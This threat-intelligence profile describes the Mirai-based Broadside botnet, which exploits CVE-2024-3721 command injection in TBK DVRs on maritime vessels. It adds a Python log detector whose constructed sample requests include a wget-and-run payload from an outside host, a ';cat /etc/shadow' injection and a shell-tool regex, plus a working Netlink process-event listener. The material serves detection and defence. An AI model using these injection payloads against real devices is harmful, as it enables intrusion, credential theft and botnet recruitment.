Mallory
Malware | Exploits 1 CVE

Broadside

Broadside is a Mirai-based botnet variant identified by Cydome that is active in the wild and targets vulnerable TBK Vision digital video recorder (DVR) devices, particularly those used in the maritime logistics sector and aboard vessels. It gains access through CVE-2024-3721, a critical OS command injection vulnerability in TBK DVR-4104 and DVR-4216 devices that is reachable without authentication through crafted HTTP POST requests to the /device.rsp endpoint; any such device whose web interface is exposed to the attacker's network can therefore be compromised without credentials. The affected hardware is also sold under rebranded names including CeNova, HVR Login, Night Owl, Novo, Pulnix, QSee, and Securus, so an asset inventory has to look past the TBK label.
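
A log-side check for the exploitation pattern described above, as an added example (not code from Cydome, TBK or Mallory): it assumes web-server or reverse-proxy logs that preserve the request line and, for POSTs, the form body. The page names only the /device.rsp endpoint; the parameter names mdb and mdc used in the constructed samples are taken from the public CVE-2024-3721 description, and the 203.0.113.0/24 address is documentation space.

```python
"""Flag HTTP requests that match the CVE-2024-3721 exploitation pattern.

Added example for this page; it is not Cydome's, TBK's or Mallory's code.
Assumes logs that keep the request line and, for POSTs, the form body.
The page names only /device.rsp; parameter names mdb/mdc come from the
public CVE description. All sample requests below are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/device.rsp"
# Shell metacharacters and fetch/execute verbs typical of command injection
# against embedded Linux; tune the verb list to your own false-positive rate.
SHELL_META = re.compile(r"[;|`&$]|\b(wget|curl|tftp|busybox|chmod|sh)\b")


def _params(qs: str) -> dict:
    """Split a query string or form body into decoded key/value pairs.
    Done by hand so that ';' inside a value is never treated as a separator
    (older urllib.parse.parse_qsl versions split on it)."""
    out = {}
    for pair in qs.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            out[unquote_plus(key)] = unquote_plus(value)
    return out


def extract_params(request_line: str, body: str = "") -> dict:
    """Merge query-string and (for POST) form-body parameters of one request."""
    method, target, *_ = request_line.split()
    params = _params(urlsplit(target).query)
    if method.upper() == "POST" and body:
        params.update(_params(body))
    return params


def is_cve_2024_3721_attempt(request_line: str, body: str = "") -> bool:
    """True when the request targets /device.rsp and any parameter carries
    shell syntax. The path check makes the rule specific; the metacharacter
    check separates an injection attempt from a normal call to the endpoint."""
    method, target, *_ = request_line.split()
    if urlsplit(target).path.lower() != TARGET_PATH:
        return False
    params = extract_params(request_line, body)
    return any(SHELL_META.search(v) for v in params.values())


# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    # 0: injection carried in the POST body (flagged)
    ("POST /device.rsp HTTP/1.1",
     "mdb=sos&mdc=cd%20/tmp;wget%20http://203.0.113.5/x;sh%20x"),
    # 1: same parameters in the query string, URL-encoded (flagged)
    ("GET /device.rsp?mdb=sos&mdc=%3Bcat%20/etc/shadow HTTP/1.1", ""),
    # 2: ordinary call to the endpoint, no shell syntax (not flagged)
    ("GET /device.rsp?opt=sys&cmd=status HTTP/1.1", ""),
    # 3: shell syntax against a different endpoint (outside this rule)
    ("POST /login.rsp HTTP/1.1", "user=admin&pass=%3Bid"),
]


def scan_requests(requests) -> list:
    """Return the indices of requests that match the rule."""
    return [i for i, (line, body) in enumerate(requests)
            if is_cve_2024_3721_attempt(line, body)]


if __name__ == "__main__":
    for i in scan_requests(SAMPLE_REQUESTS):
        print("CVE-2024-3721 attempt:", SAMPLE_REQUESTS[i][0])
```

The rule deliberately keys on the endpoint plus shell syntax rather than on a fixed payload string, since the page notes the malware uses payload polymorphism; a detection that matched one loader command would miss the next build. Note that a DVR reachable on its HTTP port from an untrusted network is a finding in itself, whether or not any attempt has been logged.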

According to public reporting, Broadside uses a mass loader that executes multi-architecture payloads directly in memory and removes on-disk artifacts to evade detection. It supports DDoS activity, including UDP flooding, and uses payload polymorphism to hinder static, signature-based defenses. Command and control runs over a custom protocol, reported on TCP/1026 with fallback to TCP/6969, and its messages are described as carrying a unique magic header; outbound connections from DVR or camera network segments to those ports are a practical pivot for network hunting, with the caveat that port numbers are cheap for an operator to change. Broadside also uses Netlink kernel sockets for stealthy, event-driven process monitoring and persistence, that is, it receives process events pushed by the kernel instead of polling /proc.
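
The Netlink mechanism referred to above, as an added example that is not Broadside's code and not from Cydome or Mallory: a subscription to the Linux process connector (CN_IDX_PROC) that decodes the kernel's fork, exec and exit events. It assumes the struct layouts from linux/netlink.h, linux/connector.h and linux/cn_proc.h; the sample datagrams are constructed, not captured, and the live loop needs Linux with CONFIG_PROC_EVENTS and CAP_NET_ADMIN. The same subscription is usable defensively on embedded Linux hosts that have no auditd.

```python
"""Event-driven process monitoring over Netlink (the Linux proc connector).

Added example for this page; not Broadside's code and not from Cydome or
Mallory. It shows the mechanism the page attributes to the malware:
subscribing to kernel fork/exec/exit events through a Netlink socket
instead of polling /proc. Offsets follow linux/netlink.h,
linux/connector.h and linux/cn_proc.h; the sample datagrams below are
constructed. The live loop needs Linux, CONFIG_PROC_EVENTS and
CAP_NET_ADMIN.
"""
import os
import socket
import struct

NETLINK_CONNECTOR = 11            # netlink protocol of the kernel connector
CN_IDX_PROC, CN_VAL_PROC = 1, 1   # connector id of the process-event source
NLMSG_DONE = 3
PROC_CN_MCAST_LISTEN = 1          # proc_cn_mcast_op: start delivery
PROC_EVENT_NONE, PROC_EVENT_FORK, PROC_EVENT_EXEC = 0x0, 0x1, 0x2
PROC_EVENT_EXIT = 0x80000000

NLMSGHDR = "=IHHII"        # len, type, flags, seq, pid             (16 bytes)
CN_MSG = "=IIIIHH"         # idx, val, seq, ack, len, flags         (20 bytes)
PROC_EVENT_HDR = "=IIQ"    # what, cpu, timestamp_ns (aligned to 8) (16 bytes)
NL_HDRLEN = struct.calcsize(NLMSGHDR)
CN_OFF = NL_HDRLEN
EV_OFF = CN_OFF + struct.calcsize(CN_MSG)
DATA_OFF = EV_OFF + struct.calcsize(PROC_EVENT_HDR)


def _frame(cn_payload: bytes, pid: int = 0) -> bytes:
    """Wrap a connector payload in cn_msg and nlmsghdr (the wire layout used
    in both directions)."""
    cn = struct.pack(CN_MSG, CN_IDX_PROC, CN_VAL_PROC, 0, 0, len(cn_payload), 0)
    cn += cn_payload
    return struct.pack(NLMSGHDR, NL_HDRLEN + len(cn), NLMSG_DONE, 0, 0, pid) + cn


def build_subscribe(pid: int) -> bytes:
    """The single message a listener sends: proc_cn_mcast_op = LISTEN."""
    return _frame(struct.pack("=I", PROC_CN_MCAST_LISTEN), pid)


def parse_proc_event(buf: bytes):
    """Decode one connector datagram into a dict; None if it is not a
    process event (wrong connector id, truncated, or just a LISTEN frame)."""
    try:
        idx, val, _seq, _ack, _len, _flags = struct.unpack_from(CN_MSG, buf, CN_OFF)
        if (idx, val) != (CN_IDX_PROC, CN_VAL_PROC):
            return None
        what, cpu, ts_ns = struct.unpack_from(PROC_EVENT_HDR, buf, EV_OFF)
        ev = {"cpu": cpu, "ts_ns": ts_ns}
        if what == PROC_EVENT_NONE:            # kernel's ack to LISTEN
            ev.update(event="ack", err=struct.unpack_from("=I", buf, DATA_OFF)[0])
        elif what == PROC_EVENT_FORK:
            ppid, _ptgid, cpid, _ctgid = struct.unpack_from("=iiii", buf, DATA_OFF)
            ev.update(event="fork", parent_pid=ppid, child_pid=cpid)
        elif what == PROC_EVENT_EXEC:          # the event a process killer keys on
            pid, tgid = struct.unpack_from("=ii", buf, DATA_OFF)
            ev.update(event="exec", pid=pid, tgid=tgid)
        elif what == PROC_EVENT_EXIT:
            pid, _tgid, code, sig = struct.unpack_from("=iiII", buf, DATA_OFF)
            ev.update(event="exit", pid=pid, exit_code=code, exit_signal=sig)
        else:
            ev.update(event="other", what=what)
        return ev
    except struct.error:                       # truncated datagram
        return None


def monitor(handler, max_events=None):
    """Live loop: bind to the proc-event multicast group, subscribe, and pass
    every decoded event to handler. A consumer typically reads
    /proc/<pid>/exe or /proc/<pid>/comm on each exec event to decide what
    to do with the new process."""
    sock = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
    sock.bind((os.getpid(), CN_IDX_PROC))      # (port id, multicast groups)
    sock.send(build_subscribe(os.getpid()))
    seen = 0
    while max_events is None or seen < max_events:
        ev = parse_proc_event(sock.recv(4096))
        if ev is not None:
            handler(ev)
            seen += 1


# Constructed datagrams in the kernel's wire layout (not captured traffic).
SAMPLE_DATAGRAMS = {
    "ack": _frame(struct.pack(PROC_EVENT_HDR, PROC_EVENT_NONE, 0, 0)
                  + struct.pack("=I", 0)),
    "exec": _frame(struct.pack(PROC_EVENT_HDR, PROC_EVENT_EXEC, 1, 2_000_000)
                   + struct.pack("=ii", 4242, 4242)),
    "exit": _frame(struct.pack(PROC_EVENT_HDR, PROC_EVENT_EXIT, 1, 3_000_000)
                   + struct.pack("=iiII", 4242, 4242, 9, 0)),
}

if __name__ == "__main__":
    for name, dgram in SAMPLE_DATAGRAMS.items():
        print(name, parse_proc_event(dgram))
    if os.name == "posix" and os.geteuid() == 0 and hasattr(socket, "AF_NETLINK"):
        monitor(print, max_events=5)           # prints the next five live events
```

Because the kernel pushes an exec event as the new process starts, a listener sees a competing binary before it has done anything, which is what makes this approach attractive to a process killer; for the same reason a defender's listener on the DVR would also see the bot's own loader stages. On the wire the first datagram after subscribing is the ack (what = PROC_EVENT_NONE), and a non-zero err there means the subscription was refused.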

Broadside includes a process-killer, or exclusivity, component described as a "Judge, Jury, and Executioner" module that terminates competing or hostile processes and keeps exclusive control of the infected host. It also attempts to harvest /etc/passwd and /etc/shadow, which researchers assessed could support foothold establishment, privilege escalation, and lateral movement beyond typical Mirai-style DDoS operations. Since /etc/shadow is readable only by root, a successful harvest implies the injected commands already run as root on the device.

The campaign is assessed as a significant threat to maritime operators because a compromised shipboard DVR can expose CCTV feeds covering areas such as the bridge, cargo holds, and engine room, saturate the vessel's satellite link with flood traffic, and potentially serve as a pivot for lateral movement toward critical OT systems. Reporting states the campaign had been active for several months when it was identified, and that more than 50,000 exposed DVRs had been observed as potential targets. High-confidence indicators and traits reported include: exploitation of CVE-2024-3721 on TBK DVR devices; Netlink-based process monitoring; custom C2 with a magic header; UDP-flood DDoS capability; in-memory multi-architecture loading; credential harvesting from /etc/passwd and /etc/shadow; and termination of competing malware or hostile processes.


Exploited CVEs

1 CVE has been correlated with this family across public research and vendor advisories.

CVE-2024-3721: OS command injection in TBK DVR-4104 and DVR-4216 (exploited in the wild)

Broadside infects TBK DVR devices affected by CVE-2024-3721, an OS command injection flaw that can be exploited remotely, without authentication, for arbitrary code execution.

Source: SecurityWeek (securityweek.com)
Activity feed

6 sources are tracked across advisories, community write-ups, and news; new activity surfaces here as Mallory finds it.
